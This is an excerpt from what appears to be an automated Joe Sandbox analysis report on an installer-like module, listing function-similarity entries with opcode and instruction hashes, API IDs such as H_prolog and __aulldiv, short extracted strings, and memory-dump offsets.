                              • Instruction ID: 82af56520403e9382f305bb7b1f5d1841212c986ad34cc96c3de298c975bbd0c
                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction Fuzzy Hash: 6A11C2B0904B64CEC720DF5AC55419AFBE4BFB5708B10CA1FC4A687B50C7F8A508CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 64fe0f4929e6bfa6a43a6e99336d8c096e5fb0fe98a10ddf03f2f79ae18a5efe
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 0A127F70E05249DFCF04CFA4C490AEDBBB5BF29308F188469E845ABB51DB31E955CBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 69d3c50e0a1260521e5b6550805c53723cf3cf40ed2f4b13d03f4da43bc77ee2
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 28B17DB1D0060ADFDB14CFA6C9949AEBBB5FF58318F20852ED415A7B90C734EA45CB50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $CK$CK
                              • API String ID: 3519838083-2957773085
                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction ID: 06c552940979f2b5e7ee87b8f070a86a5ee212082757d9b19c442036e2516fa6
                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction Fuzzy Hash: E9218E70E012458BEB04DFAAC4805EEB7B6BFA4304F54462AC512E3ED1CB748A06CAA0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C974ECC
                                • Part of subcall function 6C95F58A: __EH_prolog.LIBCMT ref: 6C95F58F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: 1e06b57a6cec8db350fc8bd76b9fc0d8c5ec39d8de50b3152f19b4dde0e6bade
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 7A21ECB1805B40CFC760CF6AC14429ABBF4FF29718B50C96EC1AA97B11D7B8A508CF59
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: <J$DJ$HJ$TJ$]
                              • API String ID: 0-686860805
                              • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction ID: a74df26bc90d298ebe10d7ab32255c1351e40a7331b4b06e38e4b40da4644b10
                              • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction Fuzzy Hash: F441C471C05289AFEF15DBA2D5A08EEB774AF3020CB60C069E12127E91FB31E649DB41
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction ID: b4b8f3c96ec9dfa4737686e431f508b7714bc01dded89640ad6d09ec826cd82c
                              • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction Fuzzy Hash: 1B118E76600204BEEB214AA5DC44EAB7BBDEFA9744F10842DF24156E90D671EC04D720
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C94E077
                                • Part of subcall function 6C94DFF5: __EH_prolog.LIBCMT ref: 6C94DFFA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :$\
                              • API String ID: 3519838083-1166558509
                              • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction ID: bcd54da7e21c29a6ff07fedf963da9f967055f04892e729d110cd3a20bc4281d
                              • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction Fuzzy Hash: 73E1CE31900209DACF25DFA8C890BEDF7B9AF2531CF10C219D85567B90EB75EA49CB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction ID: d23f8ec7981cc638b236702e11c0bc7d6272688382cb26db94b88830f2782f33
                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction Fuzzy Hash: 43914C70911648DFCB20DFA9C9849DEFBF4BF28308F54452EE556A7A50E770E948CB21
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C968C5D
                                • Part of subcall function 6C96761A: __EH_prolog.LIBCMT ref: 6C96761F
                                • Part of subcall function 6C967A2E: __EH_prolog.LIBCMT ref: 6C967A33
                                • Part of subcall function 6C968EA5: __EH_prolog.LIBCMT ref: 6C968EAA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 6d0dbe5c4d58ceb32707f3b9b3ad70ccfcb01b852e2712d1b2e6f5a94ce25efa
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 20817A31D01149DFDB19DFA5D990ADDB7B4AF39318F10809AE402A7B90DB30EA09CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction ID: a41a9ed4294be7f8317b3445dde4bdcc8ce2588c8b9dc14ae05614bd5e714359
                              • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction Fuzzy Hash: 7661AB31E012098BDF01CF54C544BEEB7F9EF59309F288058D858ABA91DB75DE05CBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: 5e6d3a629219eff6ef0c448627e4f4fc19d05d4c902802f700fea97d1abbec59
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: 69519D75A00306DFDB40CFA4C880AEEB3B9FF98758F198529D901EB641DB74E905CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction ID: 6fa32b107e88cb145106c04adf2cc47fcabaeac387bc773f7bcf3d927d4f69ce
                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction Fuzzy Hash: 52519E70905289EFCF20DFA4C8849EDB7B5BF59318F10852EE515ABA50D732DA49CB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: PdJ$Q
                              • API String ID: 3519838083-3674001488
                              • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction ID: 7f858b2d6311d06aed652ed8a467f30e8d17c9f9eb7136cd3de3923cb03c2177
                              • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction Fuzzy Hash: E841E272D02285DBCF21DFA8C4909DDB7B8FF49318F10D16AE925A7A50C332DA45CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 1c53f6e0baa837599f33cae7493caaa1e6d9c14841bdff40df136558a267b6e2
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 3E418231606745EFCB118F64C5A07EABBEAFF65208F01882EE05A97B50DB31E905CB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 0bc0cead68bb89205625d38dade3a4c886c9f99525a95d5875e6026078b24155
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: 642162B0A01744AED7208FA98880A6BBAFDEB69754F108D1EF146D7B41D670E9048B65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: f4c74c788337538c01c02b15f177e15518d4eb6cd1b8f2c130b45bb9ae92df14
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 3A0184B1E02349DADB10DF9988805AEF7B4FF69744F40982EE569E3A41C3749904CB55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: 16ec661ef5a29722fe15970be3fbb12bdfa1381e324fba3ffcd28328600b1fb1
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: 74112A71A01249DBCB00DF99C4905AEB7B4FF6C348F90C86ED46AE7640D338DA15CB95
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: ac0fd02d0585499d5ae279ab134455466db5ef40c565bd0b7da206436e41bfd6
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: 6801BCB1A117159FD724CF98C5043AAB7F8EF64729F10C81E9052A3B40C7F8E5088BA5
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C98AFCC
                                • Part of subcall function 6C98A4D1: __EH_prolog.LIBCMT ref: 6C98A4D6
                                • Part of subcall function 6C98914B: __EH_prolog.LIBCMT ref: 6C989150
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5714eb5d8f0cbcc2ec6c5a1c0b4ce526bf7633877aefda9018c8ea8679f01615
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 4F0105B1805B50CFC325CF65C4A428AFBE0BB25304F90CD5EC0A657B50D7B8A508CB68
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C9843F9
                                • Part of subcall function 6C984320: __EH_prolog.LIBCMT ref: 6C984325
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction ID: 08b092ecda8e0a987b9d9825944d5d5ed75584da7cd285aea7ce5e3ac3338def
                              • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction Fuzzy Hash: 15F08C72611014FFCB069F94DC04BDEBBB9FF69314F00842AF605A6650CBB5AA14CB98
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 18007efcf396e858ff6d07b7a1d8b2da842fc1656ca31070aa65893d1aea21f1
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: EEE09232A165109FEB28DF48D820BDEF7A8EFA5724F11411FE011A7B52CFB1E910C6A4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 43b9387fb6a5cdeb068cbd5280a64c9a40910ac5aa2fd5a5f7d8f31f3b5a1c68
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: BF51DE309042099BCF11CF94D940BDEB7B9EF3931CF10942AE81567A91DF71E96ACB91
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: e61305e5267cb88c1919b8049ea52a3630652fd8780bc310d575b98f6d55e603
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: 91F01DB06017009FC3208F05D54879BB7F4EB55709F50CD1EE19A9BA40D3B8E5088FA9